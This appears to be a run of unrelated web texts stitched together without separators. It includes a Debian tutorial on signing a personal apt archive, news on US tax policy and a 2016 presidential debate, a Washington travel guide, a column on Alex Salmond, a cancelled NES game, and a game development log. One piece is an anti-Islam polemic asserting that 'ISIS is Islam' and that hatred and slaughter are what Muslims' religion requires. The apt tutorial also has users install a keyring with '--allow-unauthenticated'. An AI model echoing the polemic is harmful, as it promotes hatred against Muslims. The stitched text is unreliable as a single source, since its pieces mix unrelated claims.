I created type 4 , which is sign only , used archive @ wijnen.dtdns.net as e-mail ( which I set up to redirect to myself ) and I did not give it a passphrase . Now I need to use it for signing release files . For this , the config file specifies that a script called sign is used . It contains :
# ! /bin/sh rm -f Release.gpg gpg -- output Release.gpg -- local-user archive @ wijnen.dtdns.net -- detach-sign `` $ 1 ''
Now I need people testing my packages to get this key into their apt trusted keyring . The best way to do this , is by making it a package . Such packages are normally called * -archive-keyring , so I 'll do that as well . I create the package directory in the archive directory . This means that the entire contents are public . That is not a problem , because only the public key will be in the package ; the private key remains safely in my private keyring ( in ~/.gnupg/secring.gpg ) .
$ mkdir wijnen-archive-keyring $ cd wijnen-archive-keyring $ gpg -- export archive @ wijnen.dtdns.net > wijnen-archive-keyring.gpg
Then I create a debian/ directory which installs this key in /etc/apt/trusted.gpg.d/ . I shall not explain here how that is done , but feel free to read the package source .
Package building
After building a package , to get it into the archive , its changes file and everything referenced from it must be copied to the incoming directory . Then mini-dinstall must be run with the arguments described above . I have a script which does all that , which is described and linked here . Please read the security considerations before using it .
User instructions
With all this set up , the instructions for my users are :
Add `` deb http : //wijnen.dtdns.net/archive sid/all/ '' ( and/or similar ) to sources.list . apt-get update . apt-get -- allow-unauthenticated install wijnen-archive-keyring apt-get install package-to-test Test the program and tell me about it .
Obviously , wijnen-archive-keyring only needs to be installed once , and they will automatically pull in updates when I publish them . My method of automatically publishing a package on every test build is perhaps not the best in that respect ; it might be good to use a separate script for running mini-dinstall . Its man page describes such a method .
WASHINGTON ( Reuters ) - A looming push to overhaul the U.S. tax code could include the repeal of Obamacare taxes left intact by last week 's collapse of the Republican healthcare bill , the Senate 's top Republican on tax policy said on Wednesday .
Senate Finance Committee Chairman Orrin Hatch said levies imposed by Obamacare , including taxes on medical devices and benefit-rich health insurance polices known as “ Cadillac ” plans , could be tackled through tax reform or a revised healthcare bill .
“ Either , as far as I 'm concerned , ” Hatch told reporters . “ Any way we can get rid of those , I think it 'd be a good thing . ”
Americans for Tax Reform , a political group in Washington that opposes all tax increases , said 21 tax hikes emerged from the 2010 Affordable Care Act , popularly known as Obamacare .
Democrats say the taxes are necessary to help moderate-to-low-income consumers obtain health coverage through private insurance and the Medicaid program for the poor and disabled .
The prospects for using tax reform to repeal Obamacare 's taxes dimmed earlier this week in the House of Representatives , when House Ways and Means Committee Chairman Kevin Brady said he would not include the Obamacare items in tax reform legislation his panel is expected to disclose later this year .
Hatch 's comments suggested the Senate could take a different approach on the taxes once a House tax reform bill reaches his chamber , unless a new healthcare bill surfaces first .
The House Republican healthcare bill , which would have repealed nearly $ 900 billion in Obamacare taxes over a decade , was pulled from consideration last Friday because Republicans lacked the votes to pass it .
Republicans say they are determined to revisit the topic , and President Donald Trump told senators on Tuesday that he expected lawmakers to reach a deal on healthcare .
“ Swampoodle ” — whose name was derived from a journalist 's description of the area as “ swampy ” ( because of its proximity to Tiber Creek ) and awash in “ puddles ” — was the heart of Washington 's Irish immigrant community in the mid-19th century . Today it 's dense with city and federal government buildings and thousands of car commuters .
National Guard Memorial Museum and Library . Photo by Amy Rogers Nazarov
National Guard Memorial Museum and Library
1 Massachusetts Ave. NW
A unit of the New York National Guard , the `` Fighting 69th '' brigade - composed largely of Irish Americans - lost well over a thousand men in the Battle of Fredericksburg , says Anne Armstrong , director of the museum that tells the 378-year-old story of America 's `` citizen-soldier . '' `` In the history of the Guard , the Civil War was a huge game-changer , '' Armstrong says .
National Postal Museum . Photo by Amy Rogers Nazarov
National Postal Museum
2 Massachusetts Ave. NE
This museum has 6 million items in its collection , the second-largest in the Smithsonian system . `` Most of our material is foreign , '' says curator of philately Dan Piazza . `` If you only tell the U.S. side of the story , it wo n't make any sense . '' The William H. Gross Stamp Gallery opened in September 2013 .
Flags at the Phoenix Park Hotel . Photo by Amy Rogers Nazarov
Phoenix Park Hotel
520 North Capitol St. NW
Opened as the Commodore Hotel in 1922 by Harry Wardman - whose last name is synonymous with a style of D.C. rowhouse and whose other hotels include the Hay-Adams - the Phoenix Park is named after Dublin 's green space of the same name . And , yes , Irish soda bread is on the breakfast menu .
Danny Coleman pulls a pint at The Dubliner . Photo by Amy Rogers Nazarov
The Dubliner Restaurant and Pub
Inside the Phoenix Park Hotel
Over the years politicians with Irish roots - including President Obama , on his mother 's side , and the late Speaker of the House Tip O'Neill - have downed pints here . The general manager of the pub is Danny Coleman 's son Gavin , whose other restaurant , Sixth Engine , is at 438 Massachusetts Ave. NW , where you can ask the bartender for an off-menu cocktail : the Swampoodle , made with Jameson 's Irish whiskey .
St. Aloysius Gonzaga Church
19 I St. NW
Desperate to escape the potato famine , tens of thousands of Irish came to Washington in the mid-1840s , says Kathleen Lane , visiting lecturer at Catholic University 's School of Architecture and Planning . `` The Jesuits saw an opportunity to create a church close to the Capitol , '' says Lane , whose ancestors were among those immigrants . The church , as well as the Capitol , features paintings by Italian American artist Constantino Brumidi .
For stories , features such as Date Lab , Gene Weingarten and more , visit WP Magazine .
Follow the Magazine on Twitter .
Like us on Facebook .
E-mail us at wpmagazine @ washpost.com .
Reddit CEO Yishan Wong . Yishan Wong / Quora Since Facebook changed its News Feed algorithm to focus more on news and less on cute cats and other memes , it appears to have stolen a huge share of referred traffic on the internet — from Reddit .
Traffic referrals are the lifeblood of the web . Publishers need incoming traffic from big , popular sites to survive , and for years Reddit has been one of the biggest sources of outgoing links to juicy content .
But suddenly , Reddit has dropped off , at least in terms of its overall share of internet traffic .
Here 's a chart from Parse.ly , the web traffic analytics company ( below ) . It shows that Google dominates the distribution of traffic on the web , and that Facebook is now a healthy second :
Parse.ly
Note that Reddit is still huge , but that `` huge '' is relative on the web — it 's distinctly second-rung to `` gargantuan . ''
Yesterday we noted that Reddit 's traffic is actually going up — it saw an 83 % increase , to 731 million unique visitors in 2013— but its share of traffic declined in the same period , according to data from Shareaholic , which measures social media sharing traffic . The decline was a drop of 36 % year-over-year , Shareaholic says :
Shareaholic
What the heck is going on ? Facebook , that 's what .
This chart from Parse.ly shows how Facebook has recently become a referrer of more than 5 % of all web clicks :
Parse.ly
Parse.ly 's data covers over 5 billion pageviews on hundreds of media properties . The company says :
The results are pretty clear . Sites that use Parse.ly analytics are showing significant changes in traffic from Facebook . Over 40 % of Parse.ly-enabled sites have experienced a 30 % -or-more growth in traffic from Facebook in 2013 . Over 60 % of our sites have seen a 10 % -or-more bump from the social network .
Over the last year , Reddit went from providing 0.33 % of the web 's traffic in December 2012 to 0.21 % in December 2013 — a 36 % drop , according to Shareaholic .
What is jarring here is that Reddit — a site dedicated to sharing stuff — only got bigger in terms of total traffic in 2013 , but appears to have become less important in terms of shared traffic over the same period .
Reddit may also be hoarding more of its own traffic .
A few things changed on Reddit in 2013 . More of Reddit 's top posts are discussions that feature few links , such as its `` ask me anything '' series in which famous people like Bill Gates or President Obama take questions from the public . And one of Reddit 's more infamous 2013 posts was this thread on the Boston Marathon bombing , which contained a bunch of incorrect information .
Plus , news organizations — Business Insider included — now more frequently use Reddit as a source of news rather than a source of traffic . So other publishers are linking in to stuff that is already on Reddit ; previously , Reddit users linked out to things they found elsewhere .
Disclosure : The author owns Facebook stock .
He did n't say he would and he did n't say he would n't .
Examine the text with reasonable care and you find , in fact , that Alex Salmond announced next-to-nothing before a BBC audience in Liverpool the other night . Instead , the First Minister offered up the kind of double negative on which news from the political bubble depends : he failed to rule something out .
Mr Salmond 's Question Time moment , seized with his usual relish , will have consequences in the real world , in due course . He can not keep his party , his public , or two constituencies on tenterhooks for very much longer . In any sense that matters , the 2015 General Election campaign has already begun . So what sort of role does he hope to play ?
The Scottish Nationalists harbour high but realistic hopes for next May 's contest . The smart money says , meanwhile , there is a fair chance of drama in the hours and days after the count . Labour , though still with the edge in polls , struggles to persuade many that Ed Miliband resembles a prime minister . David Cameron 's `` long-term economic plan '' is a busted flush . The LibDems are wrecked . All concerned regard the Ukip phenomenon with a mixture of fear and disgust .
As things stand , Westminster is about to enter the world of multi-party politics . While Mr Cameron wonders what to do about Nigel Farage , Mr Miliband has to contemplate a Scottish reckoning , a bloodbath that might have been designed to tempt Scotland 's departing First Minister back to the Commons shark pool . And why not ? For this avid student of Harold Wilson 's career , there 's fun to be had and work to be done .
Not for the first time , Mr Salmond is suspending the usual rules of political life . His party has just emerged on the losing side in a historic referendum . His resignation as SNP convenor and First Minister , by no means inevitable , was a plain admission of defeat for an individual , if not for a cause . Yet the same individual was quick to say that he had no intention of quitting politics . The customary route to obscurity for leaders who have missed their chance is not for him .
For the SNP , this is a problem . It happens to be a problem for which all other parties would kill , but the question `` What 's to be done with Alex ? '' involves tricky challenges . With his history of absences and arrivals in public life , with his long , unchallenged dominance of the party , with his unfulfilled ambitions and his addiction to politics , with his sheer appetite for the contest , Mr Salmond knows this better than anyone .
First issue : no one can tell him what to do . There is no appetite within the SNP to chart his course , but the effort would be a waste of time . He is too large a figure - whatever the diet sheet says - for that . Any strategy the party might adopt has to accommodate Mr Salmond 's strategy . He would reckon the two to be one and the same , of course . His choice , he would insist , would always be in the best interests of the SNP . But if he is not to retire entirely , what follows ?
Rocks will melt wi ' the sun , in his favourite line , before he allows himself to be sedated with a peerage . There will still be finance houses and the like - French banks , once upon a time - who could use the talents of an oil economist with a political brain , but where 's the buzz in that ? Hubristic ventures with charitable trusts might have a noble air . They are unlikely to require all the energies of an individual who will only turn 60 on Hogmanay .
But there 's the second issue . The notion Mr Salmond might simply retire to the Holyrood back benches requires a suspension of disbelief that verges on comical . Journalists would press him daily - quite right , too - for an opinion on each and every one of Nicola Sturgeon 's decisions as First Minister . If a minister once faltered the party would demand that `` proper use be made '' of the former leader 's talents and ability . The public would wonder why a real job - but which one ? - was not forthcoming .
Mr Salmond is not remotely kin to William Hague or Iain Duncan Smith . That 's a measure of two things . First , being on the losing side in the referendum has been the reverse of a catastrophe for the SNP . Burgeoning membership numbers and opinion poll ratings , not to mention the shambles within Scottish Labour , only begin to map the fact . This is not - anything but - a party heading for the wilderness , casting about in desperation for someone , anyone , to charge to its rescue .
Secondly , the SNP settled all those tricky succession issues long ago . John Swinney is content , even relieved , to have no hope of leading his party again . Ms Sturgeon is , and has been for years , the clear and obvious choice to succeed her friend and mentor . The one thing she needs now , though she would never say it , is to have Mr Salmond at arm 's length . As the First Minister in waiting understands perfectly well , and as her departing boss understands , she must be her own person .
Westminster it is , then . It may be , as Mr Salmond informed David Dimbleby , that `` absolutely decisively '' he has yet to make a decision . It may be , conveniently enough , that the SNP has yet to get around to announcing its General Election candidates . It may be the media alone have settled on Gordon , where the retirement of Malcolm Bruce will leave the beleaguered LibDems defending a 6,748 majority , as a route to Westminster . But once the alternatives are eliminated , the next phase in Mr Salmond 's career begins to seem obvious .
Some problems might yet await . Once again , these are problems for the SNP 's rivals to envy , but they are real enough . Try this : should the party emerge from the General Election chaos as a force to be reckoned with in a hung parliament , where will real leadership lie within the Nationalists ? History suggests Mr Salmond and Ms Sturgeon will perform a double act without difficulty or friction . Another reading would be that they have already thought this through . Nevertheless , people , especially Westminster people , will still want to know who holds the reins .
The existing SNP group in the Commons might be wondering about that too . On Question Time , in a forum he again mastered without difficulty before an appreciative Liverpudlian audience , Mr Salmond had the air of a man with plenty of unfinished business . First there is the gigantic New Model Army of the SNP ; second , the Smith Commission and its distractions ; third , that General Election . Westminster 's difficulties are , in each case , Nationalism 's opportunities .
What was obvious from the BBC broadcast this week was that any Unionist who hoped to see the last of Mr Salmond with the referendum decided was naïve . The people who once claimed an independence gradualist `` did n't really want '' his plebiscite in September 2014 might have struck a truth inadvertently . Why was that ?
The struggling Westminster parties will not be delighted to see him back in the Commons . He 'll take that , you must suspect , for starters .
Title screen Developer ( s ) Radiance Publisher ( s ) Capcom Producer ( s ) Christopher Riggs Designer ( s ) Christopher Riggs Programmer ( s ) Robert Morgan Artist ( s ) Nancy Nakamoto Composer ( s ) Scott Etherton Platform ( s ) NES Release NA : Genre ( s ) Action , Platform Mode ( s ) Single-player
The California Raisins : The Grape Escape is a California Raisins video game developed by Radiance for the Nintendo Entertainment System . Capcom planned to publish the game in 1990 but its release was canceled due to the California Raisins ' dwindling popularity because of the decline in raisin sales in the late 1980s and early 1990s .
Gameplay [ edit ]
Gameplay
In the single-player side-scrolling action game the player controls a California Raisin through five stages in an effort to rescue the band and their band 's musical notes that were stolen by the gang of jealous musicians . The player can walk , jump , climb on vines , moonwalk ( by pressing the `` select '' button ) and shoot an unlimited supply of grape jelly beans as projectiles . During each level the player can collect ' I ' icons that provide temporary invincibility , regular black musical notes for bonus points , 'Sunshine ' icons to restore health , and 'Raisinette ' icons to give an extra life to the player . One can also locate items by shooting at the thin air or at columns .
As was the case with other Capcom games , such as Mega Man and DuckTales , one can play the first four levels in any order , but the final level is only available after collecting the musical notes from each of the four levels . The first four levels include The Grape Vine , The Factory , The Maize Maze and The Juicery . The final level takes place in The Clouds .
Cancellation [ edit ]
The game was canceled due to the California Raisins dwindling popularity because of the downfall sales of raisins in the late 1980s/early 1990s . The game appeared to have been largely finished as it was given a full review , along with hints , by the `` Game Player 's Encyclopedia of Nintendo Games Vol . 3 . '' Flyers included with Capcom NES games released around 1990 also included the title as an upcoming game .
We were in this liquor store buying some beer , and at the counter they had these Pocket Shots . They came in Gin , Tequila and Vodka . The lady behind the counter said they 'd had Scotch but had sold out . Go figure . We bought the vodka and took it out to show all our friends . We all had a laugh .
What the hell ? What kind of alcoholic market agency thinks up this stuff ? We guess you never know when you 're going to need a shot - in airplanes or in cabs , at work or at bar mitzvahs . Actually the Vodka Pocket Shot tasted fine and did the trick . Really , it 's pretty ingenious .
We might go back for another little pouch of booze to keep handy at our next court hearing ...
Ten illustrations showing how creative people see the world
Nothing is better in life than having a powerful imagination . People who are lucky enough to have this gift can always think outside the box , whatever the situation , and as such can see the world in all its complexity and wonder . We at Bright Side value creativity above all , and we would like to show you just some of the ways in which inventive people see the world around them .
How they see nature
How they see their home
What they see when they go for a walk
What they dream about
How they relax
How they see others
How they look at simple things
How they play with kids
How they see daily life
How they see their pets
Students and others are rallying behind a teacher who they say was fired from a Catholic school in Clintonville after listing her female partner 's name in her mother 's obituary . A petition posted yesterday on change.org seeks the reinstatement of Bishop Watterson High School physical-education teacher Carla Hale .
Students and others are rallying behind a teacher who they say was fired from a Catholic school in Clintonville after listing her female partner�s name in her mother�s obituary .
A petition posted yesterday on change.org seeks the reinstatement of Bishop Watterson High School physical-education teacher Carla Hale . It has gained more than 4,000 signatures .
�It�s unfair that someone who cared so much about her students and her job should lose them on the basis of something she can not even control , � the petition says . �The school claims its mission is to teach its students about love , acceptance , and tolerance , and yet it did none of this in the way it treated Ms. Hale.�
The U.S. Catholic Conference of Bishops says the church believes God created marriage between one man and one woman , providing for the good of the couple and the procreation and education of children . It considers sex between members of the same gender �harmful and always wrong.�
According to a contract between the Roman Catholic Diocese of Columbus and the Central Ohio Association of Catholic Educators , teachers can be terminated for �immorality� or �serious unethical conduct.� Messages left for a diocese spokesman were not immediately returned this morning .
Lindsey Perkins of Dublin , a 2001 Watterson graduate , said Hale is a family friend who taught at the school for 19 years and was fired after a parent complained to the diocese about the obit , which was published in The Dispatch .
Perkins called Hale a �wonderful teacher and amazing role model� whom Watterson should be proud to have on staff .
She said she feels the Catholic Church should be accepting of gay marriage and �focus on the larger issue , which is loving and accepting everyone.�
�It�s just a very poignant time for something like this to happen , and hopefully for people to start realizing that we need to practice acceptance and humility to all people , � she said .
The Catechism of the Catholic Church urges kindness toward people with homosexual tendencies . �This inclination ... constitutes for most of them a trial , � the text says . �They must be accepted with respect , compassion and sensitivity.�
Watterson , which opened in 1954 , has an enrollment of about 1,000 students in grades nine through 12 and about 90 teachers , according to the diocese website .
@ JoAnne Viviano
ST. LOUIS — Donald Trump has nothing to lose . But what does he have to gain ?
Never in the modern era has any candidate entered a consequential debate in such a degraded position : Trump is n't merely facing an uphill climb ( as John McCain did in 2008 ) or the widespread perception he 's not up to the job ( Gerald Ford in 1976 ) or even that he was too unlikeable to get elected ( Richard Nixon in 1960 ) . No , he 's having to grapple with all of these problems at once while cloaked in disgrace and coping with an unprecedented defection of more than two dozen Republican former supporters who feel that endorsing him has become a moral transgression .
Story Continued Below
And still , even as senior Republican leaders muse about the possibility of replacing the third-party-type invader who took over their floundering party , hints of what might have been : He 's down just 4 percentage points in many national polls .
And Sunday saw the last round of polls taken before the release of Trump 's gross and grossly offensive 2005 sex-talk tape . They were n't great for him — CBS had him down by 4 points in Ohio and Wisconsin — but those would have been surmountable deficits had he not faced his Friday catastrophe .
Things might change , but the “ Trump could still turn it around ” caveat is now nothing but yadda-yadda-yadda : Even an exceptional performance at the debate here tonight might not be enough to make a big difference . But , hey , this is Donald Trump , so it 's going to be must-see-TV .
Here are five things to watch .
How will real humans react to Donald Trump ? Anderson Cooper and Martha Raddatz , two seasoned moderators of the don't-suffer-fools variety , will drive Sunday 's conversation , but the 90-minute showdown at Washington University will feature a ( relatively ) freewheeling town hall format that often leads to wild-card moments . Politicians find it harder to weasel out of tough questions when they are hurled at them by a single mother working three jobs than a millionaire anchor with houses on each coast .
Prior to Friday , there was some question whether Clinton ( who is at her best when interacting with regular people , listening to their questions like a caseworker collecting a client 's information ) or Trump ( a master showman with a funny , irreverent style ) enjoyed an advantage .
That seems like ages ago . The real action wo n't be on the stage , but in the audience of undecided voters who will question the candidates : What will they ask Trump about the revelation that he admitted to groping women and treated them like playthings to be bought with a boob job or bedroom set . And how will they react to his answers ?
This is one debate where an audience reaction shot might be the most memorable moment of the night .
Play this game at home : What would you say if you were Trump ? That 's a question many of the estimated 70 million viewers will ask themselves — and if nobody can answer it , he 's basically cooked .
Hillary Clinton would be in major trouble if Trump were n't imploding . Clinton , an Edsel candidate with a Maserati operation , has been blessed by unbelievably good fortune in drawing Trump as an opponent in the first place . He is , arguably , the only potential opponent whose unpopularity outpaces her own . That was never more apparent than on Friday , when WikiLeaks ( presumably in cahoots with Russian intelligence ) released a bombshell trove of damaging emails from the hacked Gmail account of Clinton campaign chairman John Podesta that would , in normal times , be the only topic of pre-debate analysis .
Good thing for her that Julian Assange and the Kremlin are so ignorant of American presidential politics : Here was an “ October surprise ” that would have been a far more devastating “ May surprise. ” The crown jewels , first discovered by Buzzfeed 's Ruby Cramer , was a summary of Clinton 's infamous Wall Street speech transcripts , flagged for the nastiest bits by a member of the campaign research staff .
Let 's start with the fact that she basically confirmed all of Bernie Sanders ' worst suspicions about her innermost opinions about free trade and Wall Street — telling some of the world 's fattest-cat bankers that they , and not those raggedy reformers , should play a central role in self-regulation and the government 's response to the 2008 global financial crisis .
In another speech , she went all One World , telling another $ 2,000-suit crowd that her “ dream is a hemispheric common market , with open trade and open borders , some time in the future with energy that is as green and sustainable as we can get it , powering growth and opportunity for every person in the hemisphere . ”
Donald Trump will surely slam her on the “ open borders ” crack , which contradicts Clinton 's public statements that she 's in favor of closed , carefully policed borders .
But it was the expression of her wink-wink governing strategy that seems to be the most damaging revelation of all , a somewhat nuanced admission that she believes in keeping two sets of political books , one for the powerful insiders who really run things , another for the overly excitable under-informed hoi polloi who just do n't understand that the ruling class has everything figured out , more or less .
`` I mean , politics is like sausage being made , ” she said . “ It is unsavory , and it always has been that way , but we usually end up where we need to be . But if everybody 's watching , you know , all of the back room discussions and the deals , you know , then people get a little nervous , to say the least . So , you need both a public and a private position . ”
Trump ca n't really say anything to make it better . But he 's got to try . His poorly lit , robotically recited and defiantly half-assed videotaped apology released under pressure from his staff late Friday was laughably ( or cry-ably ) inadequate . There 's a good reason that so few surrogates ( apart from the let-no-cable-slot-go-unfilled defender Rudy Giuliani , who suggested Trump will ask for “ forgiveness ” ) are jumping to his defense . It 's indefensible . Mike Pence , the discreet Indiana governor who has proved his political savvy over the past week , has scrubbed his schedule , avoiding Trump 's scandal as if it were a dying squirrel on the doorstep . Eventually Pence will have to deal with it , but let 's see if the thing can crawl away on its own .
Trump 's unavoidable-for-comment campaign manager , the disciplined pollster Kellyanne Conway ( who co-authored a book with a Democratic pollster on the increasing power of women in U.S. elections ) , has also temporarily entered the talking-head witness protection program ; the candidate 's omnipresent defenders — his kids — have been nowhere . Even his ally Ben Carson ( whom Trump has privately demeaned as “ an idiot ” ) saw fit to express his deep disgust at Trump before reaffirming his fealty .
Which is to say , the only person who can limit the damage is the candidate himself , and that 's why that the rumor he would skip the debate persisted well into the weekend despite his campaign 's denials . Several Republicans , including two who still talk to Trump , told me that they thought nothing short of a bended-knee expression of contrition would do , an admission that he 's had a problem with women , and that he 's a better man now than he was in 2005 . There 's no indication Trump will actually do that — it would be wildly out of character — and even a tearful apology probably would n't do it , although it would make for one of the most riveting reality-TV moments of all time .
He can , of course , temper the torment . And he 's likely to do his standard three-step , previewed on his video and in subsequent dial-in chats with favored reporters . 1 ) He 'll offer a broad , scripted mea culpa . 2 ) He 'll take a page ( ironically ) from Bill Clinton 's 1992 strategy in coping with the Gennifer Flowers firestorm by dodging questions and talking about “ the country. ” 3 ) He 'll go on the attack , likely a sustained assault on damaging details from her campaign 's hacked email trove and a more sustained examination of the Clinton Foundation .
All of these tactics are intelligent primary campaign politics , and Trump , as always , is doing a good job at nailing down his core support ( one post-tape poll showed the overwhelming majority of Republicans sticking with him ) . But , even during the best of times , Trump has done a pathetic job at expanding his base . The good news from the POLITICO/Morning Consult poll take after Friday 's meltdown is that Clinton ticked up to just 42 percent , a 1-point gain . The bad news ? He 's stuck at 36 percent — below the bottom end of an iron-bound 38 percent to 43 percent range he 's maintained in national polls all year .
Voters were already tuning out before Friday , and it 's hard to imagine they would be more persuadable after his private utterances were made public .
Will Trump go after Bill Clinton ? The Clinton campaign is spinning the idea that they believe Trump will use the town hall to rehash the former president 's affairs — and the years-old allegation ( unproven and unprosecuted ) that he raped a woman in the 1970s . In part , that 's because it might happen , but mostly it 's because they really , really want him to .
Trump , as he has done repeatedly , hinted at a scorched-earth debate strategy . On Saturday he retweeted Clinton accuser Juanita Broaddrick mocking Hillary Clinton 's statement that Trump 's statements about women were “ horrific. ” The Democratic nominee , she wrote , “ lives with and protects a ‘ Rapist , ' ” she wrote . After his own tape came out , he quipped that Bill Clinton had said much worse during rounds of golf .
If he does that , it would be one of the dumbest moves he 's ever made , an invitation to a longer discussion of the many other instances of boorishness and misogynistic statements in his past . Never mind the context : The town hall is supposed to be about us not him — with a focus on the policies , anxieties and problems of regular people .
Moreover , many women I 've spoken with , in both parties , told me there 's a subtle sexism implied by the whole line of attack : Whatever her role in defending Bill Clinton 's misdeeds over the year , Hillary Clinton , not her husband , is the one running for president .
Wherever I go in the world , people ask me about ISIS . And I advise them to ignore the endless debates about the peaceful versus violent nature of Islam and take a long , hard look at the Islamic State . ISIS is Islam , exposed in all its cruelty and ugliness , unchanged since Muhammad .
The atrocities committed by ISIS are merely an extension of the atrocities committed by Islam 's prophet .
The true Five Pillars of Islam are : Slaughter , Intolerance , Oppression , Hatred , and Global Dominion , because Muhammad was a slaughterer , intolerant , oppressive , hateful , and drove his armies to destroy everything and everyone that stood in the way of his establishment of a world caliphate .
Muhammad said to the people of Mecca , “ I have brought slaughter to you , ” then he beheaded every Jewish male , young and old .
ISIS immolated Jordanian pilot Muath al-Kaseasbeh , because Muhammad burned people alive .
When the leader of the Jewish Bani al-Nadir tribe refused to reveal the location of his tribe 's treasures , Muhammad ordered his soldiers to “ Torture him until you extract what he has. ” So a fire was built on the chest of Kinanah bin al-Rabi . Again , when some of his men resisted Muhammad 's planned attack against the Byzantines at Tabuk , the prophet commanded that they be burned alive in the house where they were meeting .
ISIS enslaves and rapes women because Muhammad did , even when he took a six-year-old little girl as his wife and consummated their union when she turned nine .
ISIS mutilates and crucifies men , women , and children because its prophet did . When ISIS hurled a homosexual man from a tower , and the crowd waiting below stoned him to death after they saw that he had survived , they were only following the example of their prophet who stoned homosexuals .
The only difference between 1,400 years of slaughter by Muslims , who follow the practices of Muhammad , and the carnage carried out today by ISIS is that today 's atrocities are broadcast throughout the world by social media .
Unexpectedly , social media has also made ISIS a blessing to the Muslim world , enabling Muslims to see the true face of Islam .
Hatred is what your religion requires of you , not just ritual washings . Slaughter is what your prophet demands of you , not just daily prayers . To follow Islam is to commit your life to jihad , to the destruction or subjugation of all non-Muslims in the name of the god of Islam .
But thanks to ISIS , you can free yourself from the lies of Hezbollah , Hamas , and Al-Jazeera , if you have the courage . They can not protect you from a western conspiracy , because there is none . Your enemy is Islam , not America .
When you recognize that ISIS is Islam , you free yourself from the naiveté of world leaders who tell you that ISIS is an anomaly of Islam , leaders that , I am sorry to say , include US President Barack Obama , who told CNN 's Fareed Zakaria recently that , “ There is an element growing out of Muslim communities in certain parts of the world that have perverted the religion , have embraced a nihilistic , violent , almost medieval interpretation of Islam . ”
But it is those who deny that Islam is “ nihilistic , violent , almost medieval ” who have perverted the religion .
ISIS is Islam . Religion by the sword . Religion by intolerance and violence . Religion commanded by its prophet to conquer the world , behead apostates , mutilate thieves , crucify nonmuslims , and stone everyone that engages in sexual relations that disagree with Muslim laws and practices .
ISIS has torn the mask from Islam , giving the Muslim world a choice for the first time in fourteen centuries .
Choose Islam , and you choose ISIS , because they are indistinguishable . Reject ISIS , and you reject Islam , because they are one .
ISIS must be stopped , yes . It is a threat to every nation 's security . More than that , it is a threat to the evolution of human consciousness . But it is not the sole problem of America and the West . It is , first and foremost , the responsibility of Muslims and Arabs . And the armies of Jordan , Egypt , UAE , and others are well equipped to deal with it . Western intervention will only create more chaos and reinforce the illusion of a Middle East/Western conflict .
Like Libya and Yemen , ISIS is a tribal conflict , not a political one . The Islamic State is the Sunni backlash against domination and persecution by minority Shi ' a Muslims in Iraq and the ruling Alawite minority of Syria .
Islam hates everything that is not Islam . And just as fresh water and salt water can not flow from the same spring , love and goodness can not flow from a religion that is established on hatred and violence .
As long as Muslims refuse to take a strong and aggressive stand against terrorism , they must share responsibility for the continuing atrocities . The hour has come for every Muslim to choose to be human or inhuman , noble or criminal .
If you are not familiar with From Earth , it 's a game where you , Zenaida Liu , land on an alien planet . You do n't speak the language . You do n't know anything about them nor understand how their technology works . You must find your friend Anthony , as the alien government is after you . The player can decide if she wants to fight her way through or continue peacefully without hurting anyone , trying to hide from the alien soldiers .
Posted by Au-heppa on Jun 14th , 2014
If you are not familiar with From Earth , it 's a game where you , Zenaida Liu , land on an alien planet . You do n't speak the language . You do n't know anything about them nor understand how their technology works . You must find your friend Anthony , as the alien government is after you . The player can decide if she wants to fight her way through or continue peacefully without hurting anyone , trying to hide from the alien soldiers .
Currently , most of From Earth 's gameplay is mapped out . It 's now possible to play all the way to the halfway point of the game , with all the level transitions in place . I also have most of the gameplay planned for the rest of the game with only a few ideas missing . There 's going to be a lot of playtesting from now on .
The script is progressing , albeit very slowly . I still do n't have a proper Writer , though as I have mostly decided on how the story will progress , the project would rather need a Script Editor than Writer . There is still a lot of free room in the Script .
Although the Script is not quite ready , there is still a lot that can be already recorded . The voice acting department is not doing so well . Almost all roles are still open including the main characters .
We also have a very talented new character modeller , citizen_j , so you will be happy to hear that we should soon have an updated version of the main character Zenaida 's model . The modeller has already finished his Anthony model and it 's putting the old Zenaida model into shame . We will show both of the new models later on .
Christiaan joined the team as a composer and we have been doing some work on dynamic music system similiar to that of Left 4 Dead .
I am looking for Sound Designers and any kind of help from Prop Modellers to Texture Creators . If you are interested see contact information below .
All in all the progress has been good even though I now have a day job and have n't been able to focus on the project as much .
If you missed the previous progress report , here it is again :
Thoughts on going commercial
Recently I have been thinking a lot about getting into the gaming industry and turning From Earth into a commercial project . Right now I am mostly thinking about using Indie Gogo . The problem is that right now From Earth is n't a very popular project and would not get far in crowdfunding .
I am trying to get the project ready to go into Steam Greenlight as that is almost a necessary for the project to be successful .
I do n't think switching engines is a realistic option at all because of how much work it would be . It would take at least a year of extra work , and I would probably need someone to help with the new engine . Source has so many things already built into it that I would have to implement myself , not to mention rewrite all of my code almost from scratch . A lot of the code is AI stuff and having to do all that again would be so much work that I would have to either remove a lot of the functionality or waste a lot of time .
So if the project would go commercial , it would have to be on Source Engine and on Steam .
I am planning to do a teaser trailer that would help with either getting into Greenlight and / or with Indie Gogo . The problem there is that it would either need some kind of good voice over or some great looking maps . With the script still in progress and having no voice actors for the major roles the first one is problematic . The second one is one that will take time , specially since I have to focus on so many things at the same time .
As it is , the fate of the project , and whether it will go commercial , is not yet decided . I certainly would have no problem with it staying a free game . The most important thing would be to get it into Steam and make it as accessible as possible .
More on the Language System
The Language System in From Earth is something that could easily make or break the game . It has some problems and is certainly something that probably not everybody would enjoy . People will be able to circumvent some of it by choosing the more violent actions , but it will come with the price of aliens attacking her more often .
The Language System fits the existing gameplay and narrative a lot better than for example the climbing system . It 's also more of a programmer and design problem , rather than level designer problem unlike the climbing system .
How it works
1 ) The default dialogue menu is contextual showing the choices where you speak English .
2 ) You can only speak words that the player character has heard during the game .
3 ) You need to be in a certain distance of an NPC to unlock the words they are speaking .
4 ) You can only speak in certain sentence structures so you do n't really have to try to figure out where to put the verb .
5 ) Once you speak a coherent sentence it unlocks that sentence .
6 ) Unlocked alien language sentences show up in the default dialogue menu and the player will automatically speak the alien language version to aliens .
7 ) When an alien is speaking something that relates to a sentence the player has not yet unlocked , it will show up above their head as a hint message .
Another problem is that most aliens are afraid of the player when they first see her . Only after seeing that she 's no threat will they start talking to her . To help players there are a few ways to make them trust you faster , though you have to be careful not to attack anyone , as they will soon return to their fear state .
Teaching players the language
The problem of teaching players the alien language is a tough one but also a very interesting one .
One of the most obvious ways to hint what the aliens are saying is using a lot of expressions and gestures when they talk . The meaning should come across in both the tone of their voice and their body language . They are trying to mimic the actions of the verbs with their hands when they speak . Most of the time this gets lost on the players , because of the resolution as well as the speed of the animations .
Right now there is no way for the player to read text written in the alien language , though . Not realistically anyway , so that the gameplay could depend on players understanding what it is said on the monitor screens or book pages .
